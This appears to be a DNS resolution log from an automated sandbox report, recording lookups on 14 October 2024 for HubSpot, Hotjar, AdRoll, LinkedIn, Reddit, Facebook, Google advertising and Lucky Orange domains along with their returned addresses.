                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.477715969 CEST1.1.1.1192.168.2.70xd06eNo error (0)forms-na1.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.935260057 CEST1.1.1.1192.168.2.70x8012No error (0)perf-na1.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.935260057 CEST1.1.1.1192.168.2.70x8012No error (0)perf-na1.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.936090946 CEST1.1.1.1192.168.2.70xd1f9No error (0)perf-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.440124035 CEST1.1.1.1192.168.2.70x54b4No error (0)forms.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.440474033 CEST1.1.1.1192.168.2.70x4567No error (0)forms.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.440474033 CEST1.1.1.1192.168.2.70x4567No error (0)forms.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.546978951 CEST1.1.1.1192.168.2.70x5659No error (0)cta-service-cms2.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.546978951 CEST1.1.1.1192.168.2.70x5659No error (0)cta-service-cms2.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.547643900 CEST1.1.1.1192.168.2.70x805aNo error (0)cta-service-cms2.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.565118074 CEST1.1.1.1192.168.2.70xbdeNo error (0)forms.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.565118074 CEST1.1.1.1192.168.2.70xbdeNo error (0)forms.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.565118074 CEST1.1.1.1192.168.2.70xbdeNo error (0)forms.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.565118074 CEST1.1.1.1192.168.2.70xbdeNo error (0)forms.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.565118074 CEST1.1.1.1192.168.2.70xbdeNo error (0)forms.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.565488100 CEST1.1.1.1192.168.2.70xa402No error (0)forms.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.947356939 CEST1.1.1.1192.168.2.70x47fcNo error (0)perf-na1.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.947356939 CEST1.1.1.1192.168.2.70x47fcNo error (0)perf-na1.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.948381901 CEST1.1.1.1192.168.2.70xac77No error (0)perf-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.950103998 CEST1.1.1.1192.168.2.70xe928No error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.950732946 CEST1.1.1.1192.168.2.70xb7c2No error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.950732946 CEST1.1.1.1192.168.2.70xb7c2No error (0)pacman-content-live.live.eks.hotjar.com54.171.225.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.950732946 CEST1.1.1.1192.168.2.70xb7c2No error (0)pacman-content-live.live.eks.hotjar.com34.248.145.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.950732946 CEST1.1.1.1192.168.2.70xb7c2No error (0)pacman-content-live.live.eks.hotjar.com18.203.150.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.161086082 CEST1.1.1.1192.168.2.70xf5f0No error (0)track.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.161086082 CEST1.1.1.1192.168.2.70xf5f0No error (0)track.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.161359072 CEST1.1.1.1192.168.2.70x2920No error (0)track.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.188410997 CEST1.1.1.1192.168.2.70x9274No error (0)forms.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.188410997 CEST1.1.1.1192.168.2.70x9274No error (0)forms.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.189069033 CEST1.1.1.1192.168.2.70xc6daNo error (0)forms.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.265424967 CEST1.1.1.1192.168.2.70xe217No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.789294004 CEST1.1.1.1192.168.2.70xa9cdNo error (0)track.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.789294004 CEST1.1.1.1192.168.2.70xa9cdNo error (0)track.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.789304972 CEST1.1.1.1192.168.2.70x3fa8No error (0)track.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.340035915 CEST1.1.1.1192.168.2.70x9128No error (0)forms.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.340035915 CEST1.1.1.1192.168.2.70x9128No error (0)forms.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.341073990 CEST1.1.1.1192.168.2.70x9897No error (0)forms.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.585037947 CEST1.1.1.1192.168.2.70xa281No error (0)api.hubapi.com104.18.244.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.585037947 CEST1.1.1.1192.168.2.70xa281No error (0)api.hubapi.com104.18.243.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.585037947 CEST1.1.1.1192.168.2.70xa281No error (0)api.hubapi.com104.18.242.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.585037947 CEST1.1.1.1192.168.2.70xa281No error (0)api.hubapi.com104.18.241.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.585037947 CEST1.1.1.1192.168.2.70xa281No error (0)api.hubapi.com104.18.240.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.585222960 CEST1.1.1.1192.168.2.70x8b04No error (0)api.hubapi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.586864948 CEST1.1.1.1192.168.2.70x1a43No error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.586967945 CEST1.1.1.1192.168.2.70xed60No error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.586967945 CEST1.1.1.1192.168.2.70xed60No error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.586967945 CEST1.1.1.1192.168.2.70xed60No error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.586967945 CEST1.1.1.1192.168.2.70xed60No error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.586967945 CEST1.1.1.1192.168.2.70xed60No error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.005563021 CEST1.1.1.1192.168.2.70xc58aNo error (0)forms.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.005563021 CEST1.1.1.1192.168.2.70xc58aNo error (0)forms.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.006537914 CEST1.1.1.1192.168.2.70x3caNo error (0)forms.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.250438929 CEST1.1.1.1192.168.2.70x9678No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.250438929 CEST1.1.1.1192.168.2.70x9678No error (0)scontent.xx.fbcdn.net157.240.251.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.250683069 CEST1.1.1.1192.168.2.70x2c50No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.250683069 CEST1.1.1.1192.168.2.70x2c50No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.250683069 CEST1.1.1.1192.168.2.70x2c50No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.251723051 CEST1.1.1.1192.168.2.70x3845No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252058029 CEST1.1.1.1192.168.2.70x448eNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252254963 CEST1.1.1.1192.168.2.70x498cNo error (0)api.hubapi.com104.18.241.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252254963 CEST1.1.1.1192.168.2.70x498cNo error (0)api.hubapi.com104.18.240.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252254963 CEST1.1.1.1192.168.2.70x498cNo error (0)api.hubapi.com104.18.242.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252254963 CEST1.1.1.1192.168.2.70x498cNo error (0)api.hubapi.com104.18.244.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252254963 CEST1.1.1.1192.168.2.70x498cNo error (0)api.hubapi.com104.18.243.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.252305984 CEST1.1.1.1192.168.2.70x9928No error (0)api.hubapi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.966150045 CEST1.1.1.1192.168.2.70x3412No error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.966150045 CEST1.1.1.1192.168.2.70x3412No error (0)d20519brkbo4nz.cloudfront.net18.239.94.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.966150045 CEST1.1.1.1192.168.2.70x3412No error (0)d20519brkbo4nz.cloudfront.net18.239.94.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.966150045 CEST1.1.1.1192.168.2.70x3412No error (0)d20519brkbo4nz.cloudfront.net18.239.94.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.966150045 CEST1.1.1.1192.168.2.70x3412No error (0)d20519brkbo4nz.cloudfront.net18.239.94.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.966969967 CEST1.1.1.1192.168.2.70xb3ffNo error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.967658997 CEST1.1.1.1192.168.2.70x946eNo error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.967658997 CEST1.1.1.1192.168.2.70x946eNo error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.967658997 CEST1.1.1.1192.168.2.70x946eNo error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.967658997 CEST1.1.1.1192.168.2.70x946eNo error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.967658997 CEST1.1.1.1192.168.2.70x946eNo error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.967719078 CEST1.1.1.1192.168.2.70x7239No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.970423937 CEST1.1.1.1192.168.2.70xbb8bNo error (0)js.hs-scripts.com104.16.141.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.970423937 CEST1.1.1.1192.168.2.70xbb8bNo error (0)js.hs-scripts.com104.16.138.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.970423937 CEST1.1.1.1192.168.2.70xbb8bNo error (0)js.hs-scripts.com104.16.137.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.970423937 CEST1.1.1.1192.168.2.70xbb8bNo error (0)js.hs-scripts.com104.16.139.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.970423937 CEST1.1.1.1192.168.2.70xbb8bNo error (0)js.hs-scripts.com104.16.140.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.971245050 CEST1.1.1.1192.168.2.70xf8bfNo error (0)js.hs-scripts.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.976356030 CEST1.1.1.1192.168.2.70x4a23No error (0)adservice.google.com216.58.212.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.977494001 CEST1.1.1.1192.168.2.70xb4afNo error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.978775978 CEST1.1.1.1192.168.2.70xef26No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.980232954 CEST1.1.1.1192.168.2.70x6512No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.323414087 CEST1.1.1.1192.168.2.70x3f19No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.323414087 CEST1.1.1.1192.168.2.70x3f19No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.323484898 CEST1.1.1.1192.168.2.70x5fbaNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.323484898 CEST1.1.1.1192.168.2.70x5fbaNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.798547983 CEST1.1.1.1192.168.2.70x17fdNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.798547983 CEST1.1.1.1192.168.2.70x17fdNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.798547983 CEST1.1.1.1192.168.2.70x17fdNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.798547983 CEST1.1.1.1192.168.2.70x17fdNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.798547983 CEST1.1.1.1192.168.2.70x17fdNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.798599958 CEST1.1.1.1192.168.2.70xc158No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.847248077 CEST1.1.1.1192.168.2.70xb067No error (0)d.adroll.comadserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.847248077 CEST1.1.1.1192.168.2.70xb067No error (0)adserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.com108.128.74.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.847248077 CEST1.1.1.1192.168.2.70xb067No error (0)adserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.com3.248.68.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.849123001 CEST1.1.1.1192.168.2.70x1a4eNo error (0)d.adroll.comadserver-vpc-alb-0-1578609942.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.852217913 CEST1.1.1.1192.168.2.70x998cNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.852217913 CEST1.1.1.1192.168.2.70x998cNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.852217913 CEST1.1.1.1192.168.2.70x998cNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.852217913 CEST1.1.1.1192.168.2.70x998cNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.852217913 CEST1.1.1.1192.168.2.70x998cNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.853399992 CEST1.1.1.1192.168.2.70xa3e3No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.058897972 CEST1.1.1.1192.168.2.70xa248No error (0)td.doubleclick.net142.250.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.062072992 CEST1.1.1.1192.168.2.70xa01No error (0)googleads.g.doubleclick.net142.250.186.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.101066113 CEST1.1.1.1192.168.2.70x24d7No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.479234934 CEST1.1.1.1192.168.2.70x6dbbNo error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.479300022 CEST1.1.1.1192.168.2.70x5517No error (0)analytics.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.525923014 CEST1.1.1.1192.168.2.70xa88bNo error (0)settings.luckyorange.com34.107.203.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.828558922 CEST1.1.1.1192.168.2.70x7725No error (0)stats.g.doubleclick.net108.177.15.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.828558922 CEST1.1.1.1192.168.2.70x7725No error (0)stats.g.doubleclick.net108.177.15.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.828558922 CEST1.1.1.1192.168.2.70x7725No error (0)stats.g.doubleclick.net108.177.15.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.828558922 CEST1.1.1.1192.168.2.70x7725No error (0)stats.g.doubleclick.net108.177.15.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.174141884 CEST1.1.1.1192.168.2.70x42cNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.174163103 CEST1.1.1.1192.168.2.70x15faNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.192123890 CEST1.1.1.1192.168.2.70xcc49No error (0)www.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.192123890 CEST1.1.1.1192.168.2.70xcc49No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.192720890 CEST1.1.1.1192.168.2.70x256eNo error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.192720890 CEST1.1.1.1192.168.2.70x256eNo error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122049093 CEST1.1.1.1192.168.2.70x7c07No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122049093 CEST1.1.1.1192.168.2.70x7c07No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122049093 CEST1.1.1.1192.168.2.70x7c07No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com54.72.14.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122049093 CEST1.1.1.1192.168.2.70x7c07No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com34.251.125.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122049093 CEST1.1.1.1192.168.2.70x7c07No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com63.33.18.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122174025 CEST1.1.1.1192.168.2.70x2488No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.122174025 CEST1.1.1.1192.168.2.70x2488No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.315452099 CEST1.1.1.1192.168.2.70x6e1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.315452099 CEST1.1.1.1192.168.2.70x6e1No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.316190958 CEST1.1.1.1192.168.2.70x5d24No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.329438925 CEST1.1.1.1192.168.2.70xb6eeNo error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.329438925 CEST1.1.1.1192.168.2.70xb6eeNo error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.329438925 CEST1.1.1.1192.168.2.70xb6eeNo error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.329438925 CEST1.1.1.1192.168.2.70xb6eeNo error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.329438925 CEST1.1.1.1192.168.2.70xb6eeNo error (0)d1qug1xf2dk5z6.cloudfront.net18.245.86.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.330749989 CEST1.1.1.1192.168.2.70xe7b3No error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.348800898 CEST1.1.1.1192.168.2.70xb4bfNo error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
